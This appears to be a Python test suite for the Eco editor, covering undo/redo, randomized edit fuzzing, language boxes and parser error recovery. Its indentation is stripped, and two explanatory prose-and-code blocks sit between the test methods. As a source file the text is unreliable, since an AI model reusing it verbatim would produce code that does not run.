self.move(RIGHT, 7)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.text_compare(t1.export_as_text())
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_insert_newline(self):
self.reset()
p = """class X:
def helloworld(x, y, z):
for x in range(0, 10):
if x == 1:
return 1
else:
return 12
return 13
def foo(x):
x = 1
y = 2
foo()
return 12"""
self.treemanager.import_file(p)
assert self.parser.last_status == True
self.text_compare(p)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 10)
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 0)
self.treemanager.key_normal("\r") # this has to be \r not \n (Eco works with \r)
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(p)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(p)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
@slow
def test_undo_random_insertdelete(self):
import random
self.reset()
print("self.reset()")
#self.save()
print("self.treemanager.import_file(programs.connect4)")
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
#self.save()
self.text_compare(programs.connect4)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(20))
random.shuffle(cols)
for col in cols:
print("self.treemanager.cursor_reset()")
print("self.move(%s, %s)" % (DOWN, linenr))
print("self.move(%s, %s)" % (RIGHT, col))
self.treemanager.cursor_reset()
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
if k in ["a", "c", "e", "g", "i", "k", "m", "1", "3", "5", "7"]:
# for a few characters DELETE instead of INSERT
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
else:
rk = self.get_random_key()
print("self.treemanager.key_normal(%s)" % rk)
x = self.treemanager.key_normal(rk)
if x == "eos":
continue
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.connect4)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.connect4)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
@slow
def test_undo_random_insertdeleteundo_slow(self):
self.random_insert_delete_undo(programs.connect4)
@slow
def test_undo_random_insertdeleteundo(self):
self.random_insert_delete_undo(programs.pythonsmall)
def test_undo_random_insertdeleteundo_bug1(self):
self.reset()
program = """class Connect4():
UI_DEPTH = 5
def __init__():
pass"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
self.text_compare(program)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_normal(',')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 4)
self.treemanager.key_normal(' ')
self.treemanager.undo_snapshot()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
def test_undo_random_insertdeleteundo_bug2(self):
self.reset()
prog = """class X:
def hello():
pass
def foo():
do
something
here"""
self.treemanager.import_file(prog)
assert self.parser.last_status == True
self.text_compare(prog)
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 0)
self.treemanager.key_normal(' ')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 3)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 6)
self.move(RIGHT, 11)
self.treemanager.key_normal('x')
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.text_compare(prog)
def test_undo_random_insertdeleteundo_bug3(self):
self.reset()
self.treemanager.import_file("""class C:
x = 5
""")
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 1)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 0)
self.treemanager.key_normal('\r')
self.treemanager.cursor_reset()
self.move(DOWN, 0)
self.move(RIGHT, 2)
self.treemanager.key_delete()
assert self.parser.last_status == False
def test_undo_random_insertdeleteundo_bug4(self):
self.reset()
program = """class X:
def helloworld():
for x in y:
if x:
return 1"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 1)
self.treemanager.key_normal('c')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_normal('(')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 2)
self.treemanager.key_normal('b')
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# bug causes the 'b' to be ignored by undo
assert self.treemanager.cursor.node.symbol.name == "bc"
self.treemanager.key_ctrl_z()
assert self.treemanager.cursor.node.next_term.next_term.symbol.name == "c"
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
def test_undo_random_insertdeleteundo_bug5(self):
self.reset()
program = """class X:
def x():
pass
def y():
pass2"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_normal('&')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 0)
self.treemanager.key_normal('!')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_normal('^')
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
def test_undo_random_insertdeleteundo_bug6(self):
self.reset()
program = """class X:
def x():
pass
def y():
pass2"""
self.treemanager.import_file(program)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('$')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 2)
self.treemanager.key_normal('a')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 1)
self.treemanager.key_normal('0')
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.move(RIGHT, 2)
self.treemanager.key_normal('2')
def test_undo_random_insertdeleteundo_bug7_retain(self):
self.reset()
prog = """def __init__():
pass1
# controls cpu/human players
pass2"""
self.treemanager.import_file(prog)
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 1)
self.treemanager.key_normal('m')
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 2)
self.treemanager.key_normal('f')
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 1)
self.treemanager.key_normal('=')
def test_undo_random_insertdeleteundo_bug8(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5
def __init__():
self.top = tk.Tk()
self.top.title()
self.turn = None
self.ai_players = 1
pass""")
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 18)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 6)
self.treemanager.key_normal('4')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 11)
self.treemanager.key_normal(')')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 13)
self.treemanager.key_normal('n')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('9')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('&')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 3)
self.treemanager.key_normal('+')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 14)
self.treemanager.key_normal('5')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal(',')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal('1')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 7)
self.treemanager.key_normal('c')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 9)
self.treemanager.key_normal('(')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 15)
self.treemanager.key_normal('*')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 6)
self.treemanager.key_normal('}')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('v')
def test_undo_random_insertdeleteundo_bug8_loop(self):
self.reset()
self.treemanager.import_file("""class Connect4():
UI_DEPTH = 5
def __init__():
self.top = tk.Tk()
self.top.title()
self.turn = None
self.ai_players = 1
pass""")
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 18)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 6)
self.treemanager.key_normal('4')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 11)
self.treemanager.key_normal(')')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 13)
self.treemanager.key_normal('n')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('9')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 2)
self.treemanager.key_normal('&')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 3)
self.treemanager.key_normal('+')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 14)
self.treemanager.key_normal('5')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal(',')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_normal('1')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 7)
self.treemanager.key_normal('c')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 15)
self.treemanager.key_normal('*')
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 9)
self.treemanager.key_normal('(')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 6)
self.treemanager.key_normal('}')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('v')
def test_undo_random_insertdeleteundo_bug9(self):
"""This test fails if the retainability check doesn't include a same_pos
check as described by Wagner. The node `(`, which pre-parse is a child of
`atom`, is moved outside of (and before) `atom` during the parse. Then
error recovery happens and `atom` is checked for retainability, but now
it does not contain `(` and has instead gained a newline. This means the
textlength check succeeds, but the node's position has changed due to `(`
now being before `atom`. So the retain check must fail."""
self.reset()
self.treemanager.import_file("""class Connect4():
def __init__():
self.top
self.newgamebutton
self.new""")
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 9)
self.treemanager.key_normal('(')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 8)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 9)
self.treemanager.key_normal(' ')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 6)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('=')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 3)
self.treemanager.key_normal('[')
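The same_pos condition described in the docstring of test_undo_random_insertdeleteundo_bug9 can be sketched as follows. The function name and parameters are illustrative, not Eco's actual API: a subtree is only retainable if both its text length and its absolute position are unchanged.

```python
def retainable(len_before, pos_before, len_after, pos_after):
    # Length alone is not enough: a node can keep its textlength while
    # a child (here the `(` token) moves out of it, shifting its position.
    return len_before == len_after and pos_before == pos_after

# `atom` keeps its textlength but moved one character to the right,
# so the retain check must fail.
assert retainable(1, 5, 1, 5)
assert not retainable(1, 5, 1, 6)
```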
def random_insert_delete_undo(self, program):
import random
self.reset()
#self.save()
self.treemanager.import_file(program)
assert self.parser.last_status == True
#self.save()
self.text_compare(program)
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
start_version = self.treemanager.version
for linenr in random_lines:
cols = list(range(5))
random.shuffle(cols)
for col in cols:
last_was_undo = False
print("self.treemanager.cursor_reset()")
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % (linenr))
print("self.move(RIGHT, %s)" % (col))
self.move(DOWN, linenr)
self.move(RIGHT, col)
k = self.get_random_key()
if k in ["a", "c", "e", "g", "i", "k", "m", "1", "3", "5", "7"]:
# for a few characters DELETE instead of INSERT
print("self.treemanager.key_delete()")
x = self.treemanager.key_delete()
elif k in ["o", "q", "s", "u"]:
print("self.treemanager.key_ctrl_z()")
x = self.treemanager.key_ctrl_z()
last_was_undo = True
else:
key = self.get_random_key()
print("self.treemanager.key_normal(%s)" % (repr(key)))
x = self.treemanager.key_normal(key)
if x == "eos":
continue
if not last_was_undo:
print("self.treemanager.undo_snapshot()")
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
# redo all and compare with broken
while self.treemanager.version < end_version:
self.treemanager.key_shift_ctrl_z()
self.text_compare(broken)
# undo again and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(program)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(program)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
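The randomized tests above print every action so a failing run can be replayed by hand. Seeding the RNG makes the whole script reproducible up front; this is a sketch using hypothetical helper names, not part of the suite.

```python
import random

def random_edit_script(line_count, cols_per_line=5, seed=0):
    """Generate a reproducible (line, col, action) edit script in the
    style of the randomized tests above; `seed` pins every shuffle and
    choice so a failing run replays identically."""
    rng = random.Random(seed)
    lines = list(range(line_count))
    rng.shuffle(lines)
    script = []
    for linenr in lines:
        cols = list(range(cols_per_line))
        rng.shuffle(cols)
        for col in cols:
            action = rng.choice(["delete", "insert", "undo"])
            script.append((linenr, col, action))
    return script

# The same seed always yields the same script.
assert random_edit_script(3, seed=42) == random_edit_script(3, seed=42)
```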
def test_bug_infinite_loop(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 8)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 9)
self.move(RIGHT, 0)
self.treemanager.key_delete()
def test_bug_undo_loop_2(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
start_version = self.treemanager.version
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 3)
self.treemanager.key_normal('#')
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 3)
self.treemanager.key_normal(')')
self.treemanager.undo_snapshot()
end_version = self.treemanager.version
broken = self.treemanager.export_as_text()
# undo all and compare with original
while self.treemanager.version > start_version:
self.treemanager.key_ctrl_z()
self.text_compare(programs.pythonsmall)
t1 = TreeManager()
parser, lexer = python.load()
t1.add_parser(parser, lexer, python.name)
t1.import_file(programs.pythonsmall)
self.tree_compare(self.parser.previous_version.parent, parser.previous_version.parent)
def test_bug_undo_typing(self):
self.reset()
self.treemanager.import_file(programs.pythonsmall)
assert self.parser.last_status == True
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 0)
self.treemanager.key_normal("g")
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 12)
self.move(RIGHT, 2)
self.treemanager.key_normal("%")
self.treemanager.key_ctrl_z()
self.treemanager.cursor_reset()
self.move(DOWN, 13)
self.move(RIGHT, 0)
self.treemanager.key_normal("y")
class Test_Undo_LBoxes(Test_Helper):
def setup_class(cls):
parser, lexer = phppython.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, phppython.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_simple(self):
self.reset()
self.treemanager.import_file(programs.phpclass)
self.move(UP, 1)
self.treemanager.add_languagebox(lang_dict["Python + PHP"])
self.treemanager.key_normal("p")
self.treemanager.key_normal("a")
self.treemanager.key_normal("s")
self.treemanager.key_normal("s")
self.treemanager.undo_snapshot()
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
def test_simple2(self):
pytest.skip("For some reason copy.deepcopy errors on this test with the new history service.")
self.versions = []
self.reset()
self.versions.append(self.treemanager.export_as_text())
self.treemanager.import_file(programs.phpclass)
self.versions.append(self.treemanager.export_as_text())
self.move(DOWN, 1)
self.treemanager.add_languagebox(lang_dict["Python + PHP"])
text = "def x():\r pass"
for c in text:
self.treemanager.key_normal(c)
self.treemanager.undo_snapshot()
import copy
dp = copy.deepcopy(self.parser.previous_version.parent)
self.versions.append(self.treemanager.export_as_text())
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.versions.append(self.treemanager.export_as_text())
self.move(UP, 2)
self.treemanager.key_end()
self.treemanager.key_normal("\r")
self.treemanager.undo_snapshot()
self.versions.append(self.treemanager.export_as_text())
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.versions.append(self.treemanager.export_as_text())
assert self.versions.pop() == self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
assert self.versions.pop() == self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
assert self.versions.pop() == self.treemanager.export_as_text()
self.treemanager.key_ctrl_z()
assert self.versions.pop() == self.treemanager.export_as_text()
self.tree_compare(self.parser.previous_version.parent, dp)
def test_clean_version_bug(self):
self.reset()
self.treemanager.import_file(programs.phpclass)
self.move(DOWN, 1)
self.treemanager.add_languagebox(lang_dict["Python + PHP"])
self.treemanager.key_normal("p")
self.treemanager.key_normal("a")
self.treemanager.key_normal("s")
self.treemanager.key_normal("s")
self.treemanager.undo_snapshot()
import copy
dp = copy.deepcopy(self.parser.previous_version.parent)
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.tree_compare(self.parser.previous_version.parent, dp)
self.move(UP, 1)
self.treemanager.key_end()
self.move(LEFT, 2)
self.treemanager.key_normal("x")
self.treemanager.undo_snapshot()
dp2 = copy.deepcopy(self.parser.previous_version.parent)
self.treemanager.key_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.tree_compare(self.parser.previous_version.parent, dp2)
class Test_InputLogger(Test_Python):
def test_simple(self):
log = """self.key_normal('c')
self.key_normal('l')
self.key_normal('a')
self.key_normal('s')
self.key_normal('s')
self.key_normal(' ')
self.key_shift()
self.key_normal('X')
self.key_shift()
self.key_normal(':')
self.key_normal('\r')
self.key_normal(' ')
self.key_normal('d')
self.key_normal('e')
self.key_normal('f')
self.key_normal(' ')
self.key_normal('x')
self.key_backspace()
self.key_normal('y')
self.key_shift()
self.key_normal('o')
self.key_normal('o')
self.key_shift()
self.key_normal('(')
self.key_shift()
self.key_normal(')')
self.key_normal(':')
self.key_normal('\r')
self.key_normal(' ')
self.key_normal('x')
self.key_normal(' ')
self.key_normal('=')
self.key_normal(' ')
self.key_normal('1')
self.key_cursors(KEY_UP, False)
self.key_cursors(KEY_LEFT, False)
self.key_cursors(KEY_LEFT, False)
# mousePressEvent
self.cursor.line = 1
self.cursor.move_to_x(11)
self.selection_start = self.cursor.copy()
self.selection_end = self.cursor.copy()
self.cursor.line = 1
self.cursor.move_to_x(8)
self.selection_end = self.cursor.copy()
self.cursor.line = 2
self.key_normal('f')
self.key_normal('o')
self.key_normal('o')
# mousePressEvent
self.cursor.line = 2
self.cursor.move_to_x(16)
self.selection_start = self.cursor.copy()
self.selection_end = self.cursor.copy()
self.key_backspace()
self.add_languagebox('SQL (Dummy)')
self.key_shift()
self.key_normal('S')
self.key_normal('E')
self.key_normal('L')
self.key_normal('E')
self.key_normal('C')
self.key_normal('T')
self.key_normal(' ')
self.key_shift()
self.key_normal('*')
self.key_shift()
self.key_normal(' ')
self.key_normal('F')
self.key_normal('R')
self.key_normal('O')
self.key_normal('M')
self.key_normal(' ')
self.key_normal('t')
self.key_normal('a')
self.key_normal('b')
self.key_normal('l')
self.key_normal('e')"""
self.treemanager.apply_inputlog(log)
assert self.treemanager.export_as_text() == """class X:
def foo():
x = SELECT * FROM table"""
class Test_Comments_Indents(Test_Python):
def test_newline(self):
self.reset()
for c in "y = 12 # blaz = 13":
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(LEFT, 6)
self.treemanager.key_normal("\r")
assert self.parser.last_status == True
def test_single_line_comment(self):
self.reset()
for c in """x = 12
y = 13""":
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(LEFT, 6)
self.move(UP, 1)
self.treemanager.key_normal("#")
assert self.parser.last_status == True
class Test_ChangeReporting(Test_Helper):
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_right_sibling_bug(self):
for k in "1+2+3":
self.treemanager.key_normal(k)
self.move(LEFT, 3)
self.treemanager.key_normal("+")
self.move(RIGHT, 2)
self.treemanager.key_normal("+")
self.move(LEFT, 1)
self.treemanager.key_normal("4")
class Test_ErrorRecovery(Test_Helper):
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
one = TextNode(Terminal("1"))
one.lookup = "INT"
cls.parser.previous_version.parent.children[0].insert_after(one)
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17)
def test_simple(self):
self.treemanager.import_file("1*1+2+3*4+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("+")
assert self.parser.last_status == False
def test_empty(self):
self.reset()
assert self.parser.last_status == False
def test_slow_input(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.key_normal("1")
self.treemanager.key_normal("+")
assert self.parser.last_status == False
self.treemanager.key_normal("2")
assert self.parser.last_status == True
def test_simple2(self):
self.reset()
self.treemanager.import_file("1+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
def test_simple3(self):
self.reset()
self.treemanager.import_file("1+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 2)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
def test_double_error(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.import_file("1*1+2+3*4+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("+")
self.move(LEFT, 5)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) == 2
def test_triple_error(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.import_file("1*1+2+3*4+2")
assert self.parser.last_status == True
self.treemanager.key_end()
self.move(LEFT, 3)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 1
self.move(LEFT, 5)
self.treemanager.key_normal("*")
assert len(self.parser.error_nodes) == 2
self.move(LEFT, 3)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 3
assert self.parser.last_status == False
def test_error_in_isotree(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_home()
self.move(RIGHT, 2)
self.treemanager.key_normal("*")
assert len(self.parser.error_nodes) == 1
self.move(RIGHT, 2)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 2
def test_error_in_isotree_reverse(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("+")
assert len(self.parser.error_nodes) == 1
self.move(LEFT, 3)
self.treemanager.key_normal("*")
assert len(self.parser.error_nodes) == 2
def test_testing_ooc1(self):
# Testing out-of-context analysis where the analysis fails and the result
# cannot be integrated into the tree
self.reset()
self.treemanager.import_file("1+2")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
self.treemanager.key_end()
self.treemanager.key_normal("+")
self.treemanager.key_normal("3")
def test_testing_ooc2(self):
# Testing out-of-context analysis where the analysis succeeds and the result
# is being integrated into the tree
self.reset()
self.treemanager.import_file("1+2")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
self.treemanager.key_end()
self.treemanager.key_normal("*")
assert self.treemanager.cursor.node.symbol.name == "*"
self.treemanager.key_normal("3")
assert self.treemanager.cursor.node.symbol.name == "3"
assert self.treemanager.cursor.node.left is None # if ooc fails, this would be '*'
def test_typing_after_successful_ooc(self):
self.reset()
self.treemanager.import_file("1+2")
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("*")
self.treemanager.key_end()
self.treemanager.key_normal("*")
self.treemanager.key_normal("3")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) > 0
# continue after successful out-of-context analysis and integration
self.treemanager.key_normal("+")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) > 0
self.treemanager.key_normal("3")
assert self.parser.last_status == False
assert len(self.parser.error_nodes) > 0
def test_temp(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_end()
self.move(LEFT, 4)
self.treemanager.key_normal("*")
self.move(RIGHT, 2)
self.treemanager.key_normal("+")
def test_changes_in_isotree(self):
self.reset()
self.treemanager.import_file("1+2*3")
self.treemanager.key_home()
self.move(RIGHT, 1)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
self.move(RIGHT, 3)
self.treemanager.key_normal("+")
assert self.parser.last_status == False
def test_nested_errors(self):
self.reset()
self.treemanager.key_normal("1")
self.treemanager.key_normal("+")
self.treemanager.key_normal("2")
self.move(LEFT, 2)
self.treemanager.key_normal("*")
assert self.parser.last_status == False
self.move(RIGHT, 1)
self.treemanager.key_normal("+")
assert self.parser.last_status == False
self.move(LEFT, 1)
self.treemanager.key_normal("2")
assert self.parser.last_status == False
self.move(LEFT, 1)
self.treemanager.key_backspace()
assert self.parser.last_status == True
